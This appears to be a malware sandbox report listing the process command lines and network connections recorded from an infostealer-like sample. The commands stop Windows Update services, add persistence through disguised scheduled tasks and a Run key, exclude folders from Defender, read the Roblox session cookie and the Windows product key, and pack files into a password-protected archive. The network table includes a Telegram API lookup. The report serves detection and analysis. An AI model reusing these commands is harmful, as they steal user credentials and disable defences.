"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2gwwyf4i\2gwwyf4i.cmdline"

C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

"C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDEA3.tmp" "c:\Users\Admin\AppData\Local\Temp\2gwwyf4i\CSC229DC49CB57442979C28C285F64D8449.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp118A.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp118A.tmp.bat

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2868"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\unsecapp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5ire5zvi\5ire5zvi.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1E2D.tmp" "c:\ProgramData\CSCF43CE2E5258F4DD697D053FEDB47933.TMP"

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe

"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4r3duunw\4r3duunw.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES20DC.tmp" "c:\Windows\System32\CSC1A7D769C659B400EA85FDABAD4AD8D84.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "systeminfos" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "systeminfo" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "systeminfos" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "crssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\crss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "crss" /sc ONLOGON /tr "'C:\Program Files\7-Zip\crss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "crssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\crss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\Branding\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Branding\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Windows\Branding\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Ko8RUfNOJ1.bat"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI28802\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\LrRRW.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI28802\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI28802\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\LrRRW.zip" *

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe

"C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 216.58.201.99:443 gstatic.com tcp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.179.228:80 www.google.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 8.8.8.8:53 228.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
US 104.26.12.205:443 api.ipify.org tcp
IS 193.4.123.159:80 tcp
CN 114.83.198.181:80 tcp
US 26.68.171.69:80 tcp
N/A 10.178.84.20:80 tcp
US 75.227.189.169:80 tcp
RU 109.236.254.253:80 tcp
US 20.136.248.43:80 tcp
IN 45.82.40.13:80 tcp
US 7.89.203.174:80 tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
CA 167.46.84.79:80 tcp
IT 151.85.189.101:80 tcp
US 50.214.29.5:80 tcp
BR 189.66.12.105:80 tcp
US 12.25.72.122:80 tcp
CN 112.32.47.194:80 tcp
CN 49.87.5.86:80 tcp
N/A 10.64.2.169:80 tcp
NL 5.157.91.10:80 tcp
US 33.153.179.187:80 tcp
US 71.90.246.141:80 tcp
JP 130.54.143.252:80 tcp
AL 46.99.227.32:80 tcp
CN 61.153.112.49:80 tcp
US 35.65.111.237:80 tcp
TW 220.143.247.143:80 tcp
JP 157.111.137.244:80 tcp
IT 93.37.232.90:80 tcp
TW 211.72.127.199:80 tcp
US 55.78.250.12:80 tcp
GB 194.128.249.46:80 tcp
US 34.111.185.162:80 tcp
CN 61.160.44.255:80 tcp
US 34.111.185.162:80 34.111.185.162 tcp
US 9.8.16.163:80 tcp
DE 53.231.191.71:80 tcp
UA 5.58.82.109:80 tcp
MX 200.0.109.48:80 tcp
US 13.46.224.211:80 tcp
MY 118.101.43.166:80 tcp
GB 25.92.190.143:80 tcp
US 174.253.164.59:80 tcp
SD 102.124.20.121:80 tcp
IN 161.118.31.62:80 tcp
US 47.188.48.2:80 tcp
US 8.8.8.8:53 162.185.111.34.in-addr.arpa udp
KR 124.46.42.246:80 tcp
FR 92.91.233.152:80 tcp
US 199.180.15.180:80 tcp
US 12.199.16.114:80 tcp
JP 122.223.11.203:80 tcp
KR 49.62.19.194:80 tcp
TH 171.103.154.199:80 tcp
US 184.212.9.135:80 tcp
CN 123.166.238.144:80 tcp
CA 24.36.83.150:80 tcp
US 18.28.114.89:80 tcp
TH 171.103.154.199:80 171.103.154.199 tcp
US 30.221.132.104:80 tcp
US 11.188.62.72:80 tcp
AU 152.147.126.17:80 tcp
RS 178.221.120.64:80 tcp
US 96.152.90.40:80 tcp
US 209.92.232.113:80 tcp
US 8.8.8.8:53 199.154.103.171.in-addr.arpa udp
GB 82.37.11.145:80 tcp
CH 152.96.94.210:80 tcp
US 71.230.107.38:80 tcp
TH 171.103.154.199:443 tcp
BH 56.186.94.188:80 tcp
CN 110.72.210.51:80 tcp
GB 81.132.46.9:80 tcp
US 28.242.151.63:80 tcp
US 69.83.2.13:80 tcp
US 207.70.150.221:80 tcp
US 54.49.101.11:80 tcp
US 68.158.48.214:80 tcp
US 167.88.193.199:80 tcp
NL 195.33.33.101:80 tcp
CN 183.204.110.147:80 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 167.88.193.199:80 167.88.193.199 tcp
CN 39.181.48.145:80 tcp
HR 78.134.213.195:80 tcp
SG 162.125.81.54:80 tcp
US 15.140.8.94:80 tcp
US 209.122.98.90:80 tcp
DE 53.188.72.182:80 tcp
US 22.112.106.244:80 tcp
JP 175.128.135.93:80 tcp
US 167.88.193.199:443 tcp
DK 87.73.171.73:80 tcp
ZA 197.65.97.31:80 tcp
HU 193.225.48.33:80 tcp
NL 195.240.116.207:80 tcp
US 214.29.25.9:80 tcp
NL 20.50.93.175:80 tcp
CN 210.21.44.153:80 tcp
US 135.145.195.144:80 tcp
US 8.8.8.8:53 199.193.88.167.in-addr.arpa udp
EG 196.221.99.168:80 tcp
JP 61.196.215.88:80 tcp
US 4.12.142.104:80 tcp
US 104.56.69.173:80 tcp
US 198.193.205.83:80 tcp
US 71.166.133.211:80 tcp
US 29.114.251.157:80 tcp
KR 125.128.29.167:80 tcp
NL 195.33.93.28:80 tcp
SE 192.71.19.215:80 tcp
ID 182.2.248.210:80 tcp
US 18.119.188.233:80 tcp
CN 110.199.107.113:80 tcp
PT 85.240.247.8:80 tcp
US 6.50.117.173:80 tcp
CH 169.52.6.202:80 tcp
US 69.48.183.4:80 tcp
MA 196.83.109.53:80 tcp
TW 223.141.192.7:80 tcp
KR 150.197.128.108:80 tcp
ZA 197.228.13.182:80 tcp
US 47.22.74.155:80 tcp
US 6.100.152.219:80 tcp
NL 217.102.6.58:80 tcp
TW 120.96.154.50:80 tcp
US 63.70.114.71:80 tcp
UA 91.234.79.44:80 tcp
FR 86.224.242.205:80 tcp
CN 101.92.113.154:80 tcp
US 213.176.42.75:80 tcp
NL 62.185.167.214:80 tcp
GB 89.242.99.45:80 tcp
US 213.176.42.75:80 213.176.42.75 tcp
US 55.144.97.196:80 tcp
JP 111.104.154.139:80 tcp
US 152.163.34.16:80 tcp
BR 200.188.220.159:80 tcp
CN 218.97.226.169:80 tcp
MX 189.147.141.69:80 tcp
US 44.96.197.193:80 tcp
CN 47.103.75.124:80 tcp
CN 124.112.231.170:80 tcp
US 135.160.161.150:80 tcp
IT 95.229.81.75:80 tcp
DE 193.103.19.131:80 tcp
UA 176.38.214.90:80 tcp
CN 125.105.9.42:80 tcp
US 65.129.38.160:80 tcp
US 192.27.34.100:80 tcp
VN 117.7.9.216:80 tcp
SE 217.67.88.255:80 tcp
US 68.179.210.88:80 tcp
CN 49.64.36.73:80 tcp
US 8.8.8.8:53 75.42.176.213.in-addr.arpa udp
BR 177.31.96.9:80 tcp
US 99.127.88.85:80 tcp
US 55.170.103.185:80 tcp
IR 188.159.45.69:80 tcp
US 6.74.119.194:80 tcp
US 165.156.30.211:80 tcp
JP 133.67.69.45:80 tcp
US 160.128.9.44:80 tcp
JP 180.42.69.88:80 tcp
US 7.140.204.146:80 tcp
FR 163.115.45.26:80 tcp
BR 191.61.115.131:80 tcp
DE 51.75.90.208:80 tcp
US 143.200.106.32:80 tcp
US 204.51.240.12:80 tcp
UA 109.86.252.157:80 tcp
DE 51.75.90.208:80 51.75.90.208 tcp
GE 188.169.78.185:80 tcp
BR 191.61.115.131:80 191.61.115.131 tcp
US 47.160.21.172:80 tcp
US 8.8.8.8:53 208.90.75.51.in-addr.arpa udp
US 8.8.8.8:53 131.115.61.191.in-addr.arpa udp
US 158.76.97.154:80 tcp
US 65.14.224.183:80 tcp
NZ 125.236.90.127:80 tcp
US 155.164.75.245:80 tcp
EG 156.182.16.233:80 tcp
US 73.252.173.19:80 tcp
US 140.74.69.140:80 tcp
CA 99.236.11.74:80 tcp
US 135.244.38.247:80 tcp
US 96.37.235.138:80 tcp
N/A 100.124.230.211:80 tcp
SG 43.51.9.25:80 tcp
SG 61.16.105.236:80 tcp
UA 195.178.149.181:80 tcp
CN 123.92.69.215:80 tcp
CN 8.141.164.130:80 tcp
KR 166.104.123.159:80 tcp
N/A 10.9.92.229:80 tcp
US 164.153.92.83:80 tcp
CN 117.79.178.82:80 tcp
KR 166.104.123.159:80 tcp
PT 79.168.110.61:80 tcp
AU 115.64.156.12:80 tcp
US 143.187.233.105:80 tcp
VE 190.37.106.123:80 tcp
US 161.206.255.170:80 tcp
US 21.250.132.57:80 tcp
JP 157.63.211.144:80 tcp
CN 121.194.147.188:80 tcp
CN 36.112.181.44:80 tcp
US 21.52.20.144:80 tcp
US 16.61.160.65:80 tcp
US 8.8.8.8:53 159.123.104.166.in-addr.arpa udp
JP 194.53.191.205:80 tcp
JP 126.199.119.145:80 tcp
US 107.3.126.39:80 tcp
JP 114.168.240.79:80 tcp
AR 181.23.27.247:80 tcp
IT 79.42.218.151:80 tcp
BR 201.25.94.164:80 tcp
BR 179.64.9.195:80 tcp
GB 86.181.106.132:80 tcp
FR 15.237.240.70:80 tcp
US 30.124.40.110:80 tcp
TN 196.227.117.85:80 tcp
KR 39.20.61.163:80 tcp
IE 56.52.195.8:80 tcp
US 172.89.234.204:80 tcp
US 152.70.156.238:80 tcp
US 205.115.248.170:80 tcp
FR 139.124.124.124:80 tcp
US 206.164.23.40:80 tcp
AU 147.41.240.134:80 tcp
KR 203.225.34.134:80 tcp
DE 141.45.17.44:80 tcp
CH 91.108.184.72:80 tcp
CN 36.115.197.90:80 tcp
US 76.181.139.195:80 tcp
CN 222.94.28.83:80 tcp
US 131.53.105.120:80 tcp
CN 129.204.41.4:80 tcp
CN 58.253.67.48:80 tcp
US 140.64.241.182:80 tcp
RO 5.83.45.64:80 tcp
CN 59.75.239.24:80 tcp
RO 5.83.45.64:80 5.83.45.64 tcp
US 50.37.140.98:80 tcp
CN 218.106.232.13:80 tcp
US 215.2.57.172:80 tcp
US 143.181.174.29:80 tcp
US 73.78.137.86:80 tcp
NL 194.45.86.116:80 tcp
JP 153.183.221.240:80 tcp
EG 154.190.184.70:80 tcp
MG 154.126.96.13:80 tcp
US 48.201.108.119:80 tcp
US 71.157.136.149:80 tcp
BR 201.59.136.45:80 tcp
GA 41.158.242.199:80 tcp
EG 105.199.99.3:80 tcp
SG 27.111.144.122:80 tcp
RU 5.35.106.55:80 tcp
US 38.184.29.43:80 tcp
CH 178.82.226.111:80 tcp
CN 121.197.161.164:80 tcp
US 8.8.8.8:53 64.45.83.5.in-addr.arpa udp
DE 213.20.197.251:80 tcp
US 99.145.132.126:80 tcp
JP 150.71.102.58:80 tcp
ZA 165.149.137.83:80 tcp
KR 60.196.148.195:80 tcp
DE 213.68.157.249:80 tcp
CN 43.195.162.212:80 tcp
DE 79.236.199.85:80 tcp
US 146.57.77.226:80 tcp
CN 115.170.123.233:80 tcp
JP 125.199.25.48:80 tcp
IR 5.112.144.16:80 tcp
FI 164.13.70.49:80 tcp
JP 121.82.210.82:80 tcp
DE 87.155.231.215:80 tcp
IE 143.239.68.194:80 tcp
JP 133.55.51.90:80 tcp
CH 178.195.86.121:80 tcp
US 72.47.40.32:80 tcp
GB 86.134.115.165:80 tcp
US 4.32.191.168:80 tcp
KR 223.46.225.164:80 tcp
US 135.202.34.203:80 tcp
US 6.78.93.110:80 tcp
US 28.197.56.47:80 tcp
US 35.93.240.43:80 tcp
US 57.170.49.53:80 tcp
US 161.47.169.84:80 tcp
US 51.10.210.163:80 tcp
US 76.47.14.252:80 tcp
US 98.195.147.215:80 tcp
US 158.145.20.66:80 tcp
IL 2.54.26.88:80 tcp
CN 110.59.205.92:80 tcp
RU 109.184.199.50:80 tcp
BR 200.147.221.160:80 tcp
FR 37.167.149.237:80 tcp
US 204.177.97.68:80 tcp
US 56.62.144.59:80 tcp
US 71.126.5.143:80 tcp
BR 189.120.88.104:80 tcp
IR 62.60.175.134:80 tcp
US 6.202.94.136:80 tcp
US 99.0.18.234:80 tcp
JP 126.190.234.101:80 tcp
US 156.66.102.246:80 tcp
US 29.255.148.127:80 tcp
CN 61.135.246.236:80 tcp
US 73.35.186.119:80 tcp
US 16.135.244.96:80 tcp
US 50.178.70.212:80 tcp
NL 161.88.168.63:80 tcp
US 136.63.240.187:80 tcp
CN 119.2.202.83:80 tcp
CO 179.15.184.210:80 tcp
RS 46.240.148.200:80 tcp
US 66.81.144.187:80 tcp
US 205.205.200.162:80 tcp
US 167.211.209.154:80 tcp
CL 190.160.194.142:80 tcp
CN 111.51.194.157:80 tcp
EG 196.205.207.11:80 tcp
DE 83.126.104.207:80 tcp
TW 140.112.110.127:80 tcp
AE 31.29.81.215:80 tcp
US 68.16.57.96:80 tcp
TW 111.248.69.16:80 tcp
SG 156.249.45.76:80 tcp
BR 177.68.89.7:80 tcp
GU 114.142.209.86:80 tcp
FR 185.252.237.166:80 tcp
US 208.175.30.89:80 tcp
US 173.18.15.143:80 tcp
US 108.98.128.138:80 tcp
TW 203.69.225.205:80 tcp
US 96.18.228.167:80 tcp
KR 61.101.184.72:80 tcp
US 139.241.178.246:80 tcp
BY 46.216.182.232:80 tcp
ZA 13.244.147.173:80 tcp
US 142.197.116.206:80 tcp
GU 114.142.209.86:80 114.142.209.86 tcp
US 66.68.28.253:80 tcp
ZA 13.244.147.173:80 13.244.147.173 tcp
CN 211.97.210.203:80 tcp
US 69.209.93.84:80 tcp
CN 182.81.98.23:80 tcp
US 68.251.249.24:80 tcp
IN 117.237.231.233:80 tcp
PS 213.6.180.71:80 tcp
HR 88.207.124.31:80 tcp
CN 110.179.71.29:80 tcp
GB 25.92.175.207:80 tcp
MX 148.210.194.159:80 tcp
BR 190.89.166.54:80 tcp
DE 53.172.84.156:80 tcp
ID 103.105.129.13:80 tcp
US 8.8.8.8:53 86.209.142.114.in-addr.arpa udp
US 8.8.8.8:53 173.147.244.13.in-addr.arpa udp
US 40.129.63.104:80 tcp
US 208.95.112.1:80 ip-api.com tcp
US 192.1.5.214:80 tcp
US 209.48.195.240:80 tcp
US 28.185.162.208:80 tcp
JP 220.8.189.254:80 tcp
AE 5.30.198.103:80 tcp
BR 187.91.212.9:80 tcp
N/A 100.103.41.62:80 tcp
HK 58.96.170.216:80 tcp
JP 133.126.91.229:80 tcp
US 29.202.254.176:80 tcp
CN 113.206.67.100:80 tcp
MA 105.145.253.64:80 tcp
US 38.96.196.198:80 tcp
IT 5.170.153.192:80 tcp
JP 114.69.62.76:80 tcp
CN 36.169.19.197:80 tcp
US 34.30.158.180:80 tcp
DE 84.131.202.126:80 tcp
IN 101.218.14.123:80 tcp
KR 223.52.126.234:80 tcp
AU 110.20.233.122:80 tcp
JP 221.46.223.168:80 tcp
DE 143.93.234.24:80 tcp
KR 175.237.12.202:80 tcp
US 131.150.198.76:80 tcp
SA 100.195.195.44:80 tcp
AR 200.59.239.53:80 tcp
US 46.169.192.242:80 tcp
NL 92.120.134.3:80 tcp
US 29.253.150.125:80 tcp
US 29.193.29.125:80 tcp
ID 111.95.140.21:80 tcp
US 63.71.103.200:80 tcp
CN 119.86.94.49:80 tcp
CN 123.149.26.142:80 tcp
US 209.33.14.177:80 tcp
US 162.82.197.185:80 tcp
CN 118.78.4.159:80 tcp
ID 149.129.252.224:80 tcp
US 136.6.126.111:80 tcp
DK 5.103.171.189:80 tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
CN 58.66.124.120:80 tcp
US 148.100.252.197:80 tcp
US 12.248.214.227:80 tcp
JP 106.165.204.100:80 tcp
CN 36.249.130.59:80 tcp
JP 126.66.242.197:80 tcp
TW 140.124.59.195:80 tcp
ES 84.120.157.52:80 tcp
CA 205.250.231.168:80 tcp
RU 62.117.116.38:80 tcp
US 169.130.223.111:80 tcp
US 198.39.152.254:80 tcp
CA 134.195.144.133:80 tcp
US 13.225.218.20:80 tcp
US 13.225.218.20:80 13.225.218.20 tcp
US 216.224.28.150:80 tcp
JP 125.203.95.149:80 tcp
IT 81.56.178.121:80 tcp
US 99.5.222.45:80 tcp
JP 110.162.236.5:80 tcp
US 206.118.34.14:80 tcp
US 167.5.142.81:80 tcp
US 8.8.8.8:53 20.218.225.13.in-addr.arpa udp
US 97.222.220.37:80 tcp
BR 189.115.25.3:80 tcp
US 199.253.156.185:80 tcp
SE 37.199.209.73:80 tcp
US 134.159.48.242:80 tcp
TW 110.24.86.102:80 tcp
CA 138.214.186.170:80 tcp
US 172.178.246.175:80 tcp
IT 95.241.98.241:80 tcp
ID 111.95.40.186:80 tcp
US 38.27.247.49:80 tcp
CA 38.117.73.29:80 tcp
SE 4.223.123.166:80 tcp
DK 80.62.113.131:80 tcp
US 134.149.242.27:80 tcp
US 147.49.204.92:80 tcp
US 43.221.67.178:80 tcp
JP 49.133.86.237:80 tcp
US 69.243.186.73:80 tcp
GB 138.40.210.204:80 tcp
US 170.99.191.179:80 tcp
NL 185.218.138.200:80 tcp
US 157.246.127.16:80 tcp
BR 179.237.169.80:80 tcp
CN 182.241.117.89:80 tcp
GB 17.79.29.19:80 tcp
US 66.54.228.129:80 tcp
US 173.23.36.55:80 tcp
DE 217.184.185.34:80 tcp
ES 90.170.75.88:80 tcp
US 98.171.115.253:80 tcp
US 159.105.76.171:80 tcp
AO 154.127.132.186:80 tcp
CN 27.194.129.223:80 tcp
SI 149.62.115.65:80 tcp
DE 79.248.187.104:80 tcp
IT 31.189.237.102:80 tcp
US 174.201.73.147:80 tcp
US 174.131.46.124:80 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 21.112.153.12:80 tcp
VN 14.234.60.137:80 tcp
US 129.186.140.185:80 tcp
US 98.147.13.38:80 tcp
US 164.50.57.166:80 tcp
CH 162.86.149.135:80 tcp
NL 172.255.224.48:80 tcp
US 8.8.8.8:53 google.com udp
US 149.35.129.83:80 tcp
JP 160.249.70.21:80 tcp
US 208.18.235.17:80 tcp
US 24.95.255.255:80 tcp
US 64.67.33.14:80 tcp
US 8.8.8.8:53 api.telegram.org udp
US 34.235.132.197:80 tcp
CA 24.138.175.180:80 tcp
CN 118.244.103.9:80 tcp
US 48.135.186.197:80 tcp
HR 89.201.160.60:80 tcp
ZA 41.122.234.214:80 tcp
HR 89.201.160.60:80 89.201.160.60 tcp
US 166.39.106.105:80 tcp
ES 185.69.10.254:80 tcp
BR 204.216.175.120:80 tcp
